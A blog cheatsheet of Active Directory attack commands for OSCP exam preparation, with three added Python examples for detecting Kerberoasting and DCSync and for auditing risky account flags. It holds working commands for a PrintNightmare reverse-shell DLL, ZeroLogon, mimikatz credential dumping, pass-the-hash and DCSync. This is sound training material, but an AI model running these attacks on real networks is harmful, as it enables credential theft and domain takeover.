mkiesel.ch

Active Directory Cheatsheet

26. Apr 2022, by manu in posts

Here are some tips and tricks that got me through the AD part of my OSCP exam.

Please note that this cheatsheet is outdated. An update is in progress.

Set DNS / hosts #

Add the DC and all found clients into your /etc/hosts file.

192.168.99.10 dc1.domain.com dc1 domain.com
192.168.99.20 client1.domain.com client1

You could also add the DC to your /etc/resolv.conf, but that makes internet research slower, since all your requests would first go to the DC and time out there.

Get a Shell or Credentials #

DNS Recon

Use fierce↗ to check for other servers inside the AD.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

User Recon

Use windapsearch↗ to make LDAP queries. Often does not require a password!

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute↗ to enumerate users

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt 
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec↗ to enumerate users

cme smb IP -u '' -p '' --users

# Get password policy
cme smb IP -u '' -p '' --pass-pol

Use username-anarchy↗ to format found names on company websites

username-anarchy -i INFILE > OUTFILE

Use cewl↗ to crawl websites for words to pack into a wordlist

cewl -d DEPTH -m MINIMUMLENGTH --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

RPC Recon

# Could require credentials
rpcclient -U '' IP
    enumdomusers
    enumdomgroups
    # Check printer description for passwords
    enumprinters

impacket-rpcdump IP
# Check for PrintNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

SMB Recon

Check for anonymous/open shares

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

After Shell and/or Credentials #

Get a Shell #

Some ways to get a shell by just having a pair of credentials:

# Common
impacket-psexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-smbexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-wmiexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP

# WinRM (tcp/5985) needs to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD'  IP

# Quite rare
impacket-atexec 'DOMAIN/user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN/user:PASSWORD@IP'

Check for ASREPRoast #

# AD attrib: DONT_REQ_PREAUTH
impacket-GetNPUsers 'DOMAIN/user:PASSWORD' -dc-ip DCIP

Check for Kerberoast #

impacket-GetUserSPNs 'DOMAIN/user:PASSWORD' -dc-ip DCIP

Basic PowerShell script you can run from a shell inside the AD:

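# Current domain object (source of the PDC name and the domain DN)
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
# Build the LDAP path: LDAP://<PDC>/DC=domain,DC=com
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain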

# Search by what
$Searcher.filter="serviceprincipalname=*"

$Result = $Searcher.Findall()

Write-Host "---------------------------"
Foreach($obj in $Result)
{
    
    ForEach($prop in $obj.Properties) {
        # uncomment to print all attributes
        #$prop
    }
    Write-Host "[SAM Account Name]"
    $obj.Properties.samaccountname
    Write-Host ""
    Write-Host "[User Principal Name]"
    $obj.Properties.userprincipalname
    Write-Host ""
    Write-Host "[Service Principal Name]"
    $obj.Properties.serviceprincipalname
    Write-Host "---------------------------"
}

To request the ticket with PowerShell:

add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'

To request the ticket with mimikatz:

.\mimikatz.exe
    kerberos::ask /target:SPN
    kerberos::list /export

Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.

.\mimikatz.exe
    # Verify the ticket exists
    kerberos::list
    # Export to current folder
    kerberos::list /export

Transfer the ticket to Kali, and crack it with kerberoast↗.

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone https://github.com/nidem/kerberoast/     
cd kerberoast
pip3 install pyasn1

# Crack
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with Hashcat and kirbi2hashcat↗.

python kirbi2hashcat.py ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt
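
Seen from the DC, every ticket request in this section is a Security event 4769, and the tickets hashcat mode 13100 cracks are the RC4 (0x17) ones. The following is an added detection example, not part of the original cheatsheet: it flags accounts that request RC4 tickets for several distinct services in a short window. The CSV layout, the sample events and the thresholds are constructed assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 targets

# Constructed sample: 4769 events exported as CSV (column names are assumptions).
SAMPLE_4769 = """\
time,account,service,etype
2022-04-26T10:00:01,alice@DOMAIN.COM,HTTP/web1,0x12
2022-04-26T10:00:05,bob@DOMAIN.COM,MSSQLSvc/sql1:1433,0x17
2022-04-26T10:00:06,bob@DOMAIN.COM,HTTP/web1,0x17
2022-04-26T10:00:07,bob@DOMAIN.COM,CIFS/files1,0x17
2022-04-26T10:00:09,bob@DOMAIN.COM,krbtgt,0x17
2022-04-26T10:00:10,CLIENT1$@DOMAIN.COM,MSSQLSvc/sql1:1433,0x17
2022-04-26T11:30:00,carol@DOMAIN.COM,MSSQLSvc/sql1:1433,0x17
"""


def kerberoast_suspects(text, min_services=3, window=timedelta(minutes=5)):
    """Accounts that requested RC4 tickets for >= min_services SPNs within window."""
    per_account = defaultdict(list)
    for row in csv.DictReader(io.StringIO(text)):
        user = row["account"].split("@")[0]
        # Machine accounts and krbtgt requests are routine 4769 noise.
        if (int(row["etype"], 16) != RC4_HMAC or user.endswith("$")
                or row["service"].lower().startswith("krbtgt")):
            continue
        per_account[row["account"]].append(
            (datetime.fromisoformat(row["time"]), row["service"]))
    suspects = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            seen = {svc for when, svc in reqs[i:] if when - start <= window}
            if len(seen) >= min_services:
                suspects[account] = sorted(seen)
                break
    return suspects


if __name__ == "__main__":
    for account, services in kerberoast_suspects(SAMPLE_4769).items():
        print(f"ALERT {account}: RC4 tickets for {services}")
```
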

Check for the Big Exploits #

These exploits only require valid domain credentials.

PrintNightmare #

CVE-2021-1675

Check with:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

# Terminal 1
cd /SHOME/PATH/SOMEFOLDER
git clone https://github.com/cube0x0/impacket
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py -O ./impacket/CVE-2021-1675.py
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2
cd /SHOME/PATH/SOMEFOLDER
source impacket/bin/activate
cd impacket

msfvenom -p windows/shell_reverse_tcp LHOST=LISTENINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
smbserver.py drop $(pwd) -smb2support

# Set up listener

# Terminal 1
python3 CVE-2021-1675.py domain.com/user:password@dcip '\\LISTENINGIP\drop\evil.dll'

SAM the Admin #

CVE-2021-42278
CVE-2021-42287

git clone https://github.com/WazeHell/sam-the-admin
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

python sam_the_admin.py DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios domain.com

ZeroLogon #

CVE-2020-1472

git clone https://github.com/risksense/zerologon/
cd zerologon

# DC NAME NOT FQDN!
python3 set_empty_pw.py DCNAME DCIP

goldenPAC #

CVE-2014-6324

impacket-goldenPac 'domain.com/user:password@dc'

Tools #

Mimikatz #

# Hashdump
.\mimikatz.exe
    # Elevate
    privilege::debug
    # Check for logged on passwords (requires admin/system)
    sekurlsa::logonpasswords
    # Dump SAM
    lsadump::lsa /patch

# Overpass the Hash
.\mimikatz.exe
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
klist
net use \\DC
klist

# Pass the Ticket
.\mimikatz.exe
    # Elevate
    privilege::debug
    # Export the tickets
    # Creates .kirbi files in current folder
    sekurlsa::tickets /export

    # Load Ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket
.\mimikatz.exe
    # Elevate
    privilege::debug
    kerberos::purge
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rc4:SERVICEHASH /ptt

Rubeus #

# Harvest TGTs
.\Rubeus.exe harvest /interval:30

# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200  /usr/share/wordlists/rockyou.txt

CrackMapExec #

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success

Bloodhound #

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely 
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All

# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName loot.zip

Other Techniques #

KrbRelayUp #

Gets you a local SYSTEM shell if LDAP Signing and LDAP Channel Binding are not enforced.

# https://github.com/Dec0ne/KrbRelayUp
# Do not use cmd.exe or powershell.exe. Those will spawn on desktop not in shell
.\KrbRelayUp.exe relay -d domain.com -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d domain.com -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

Pass the Hash #

Works only on servers with NTLM authentication.

pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH

Dump local SAM and Crack Hashes #

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

samdump2 system.out sam.out -o hashes.txt

hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

Dump the NTDS #

secretsdump.py -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history

DC Sync Attack #

Needs GetChangesAll

secretsdump.py DOMAIN/USER@DCIP
secretsdump.py DOMAIN/USER@DCIP -just-dc-user USERTOGETHASH
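
For the blue team, a replication request from anything other than a DC is the signal here. The following is an added detection example, not part of the original cheatsheet: it scans Security event 4662 records for the replication extended-right GUIDs and reports accounts outside an allowlist that used Get-Changes-All. It assumes directory-service access auditing is enabled; the JSON field names, the sample events and the allowlist are constructed.

```python
import json
import re

# Extended rights exercised by a replication request (event 4662 "Properties").
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Assumption: only the DC machine accounts are expected to replicate.
EXPECTED_REPLICATORS = {"dc1$"}

# Constructed 4662 events, one JSON object per line (field names are assumptions).
SAMPLE_4662 = """\
{"time": "2022-04-26T09:00:00", "subject": "DC1$", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"time": "2022-04-26T09:12:41", "subject": "jdoe", "properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}"}
{"time": "2022-04-26T09:12:41", "subject": "jdoe", "properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"}
{"time": "2022-04-26T09:30:00", "subject": "helpdesk", "properties": "{00000000-0000-0000-0000-000000000000}"}
"""

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def dcsync_suspects(text):
    """Return {account: sorted replication rights used} for unexpected replicators."""
    used = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        subject = event["subject"].lower()
        rights = {REPLICATION_RIGHTS[g.lower()]
                  for g in GUID_RE.findall(event["properties"])
                  if g.lower() in REPLICATION_RIGHTS}
        if rights and subject not in EXPECTED_REPLICATORS:
            used.setdefault(subject, set()).update(rights)
    # Get-Changes-All is the right that covers secret attributes (password hashes).
    return {acct: sorted(r) for acct, r in used.items()
            if "DS-Replication-Get-Changes-All" in r}


if __name__ == "__main__":
    for account, rights in dcsync_suspects(SAMPLE_4662).items():
        print(f"ALERT {account} replicated directory data: {rights}")
```
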

SPN Impersonate #

Needs TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

# We need to have the same time as the DC
# Stop getting time from vhost
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo ntpdate DCIP

getST.py -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate administrator DOM/USER
export KRB5CCNAME=Administrator.ccache

impacket-psexec -k DOMAIN/Administrator@DC -no-pass

# Revert NTP to VBox
sudo service virtualbox-guest-utils start
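
The ASREPRoast, Kerberoast and SPN Impersonate sections each depend on one account setting: DONT_REQ_PREAUTH, a user account carrying an SPN, and TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (listed as TRUSTED_TO_AUTH_FOR_DELEGATION in the userAccountControl documentation). The following is an added audit example, not part of the original cheatsheet: it decodes userAccountControl from an LDAP export and lists the enabled accounts exposed to each. The export layout and the account records are constructed.

```python
ACCOUNTDISABLE = 0x2  # userAccountControl bits (Microsoft-documented values)
DONT_REQ_PREAUTH = 0x400000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

# Constructed LDIF-style export; account names and values are made up.
SAMPLE_LDIF = """\
sAMAccountName: legacy
userAccountControl: 4194816

sAMAccountName: svc_web
userAccountControl: 16777728
servicePrincipalName: HTTP/web1.domain.com

sAMAccountName: old_admin
userAccountControl: 4194818
"""


def parse_ldif(text):
    """Split the export into one {attribute: [values]} dict per entry."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            key, _, value = line.partition(": ")
            entry.setdefault(key, []).append(value)
        entries.append(entry)
    return entries


def audit(text):
    """Return {account: [findings]}; disabled accounts are skipped."""
    report = {}
    for entry in parse_ldif(text):
        uac = int(entry["userAccountControl"][0])
        if uac & ACCOUNTDISABLE:
            continue
        findings = [msg for hit, msg in (
            (uac & DONT_REQ_PREAUTH, "pre-authentication disabled (AS-REP roastable)"),
            (entry.get("servicePrincipalName"), "user account with SPN (Kerberoastable)"),
            (uac & TRUSTED_TO_AUTH_FOR_DELEGATION, "protocol transition enabled"),
        ) if hit]
        if findings:
            report[entry["sAMAccountName"][0]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_LDIF).items():
        print(name, "->", "; ".join(findings))
```
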

Show LAPS Passwords #

If an owned user is either LAPS admin or just LAPS reader:

ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd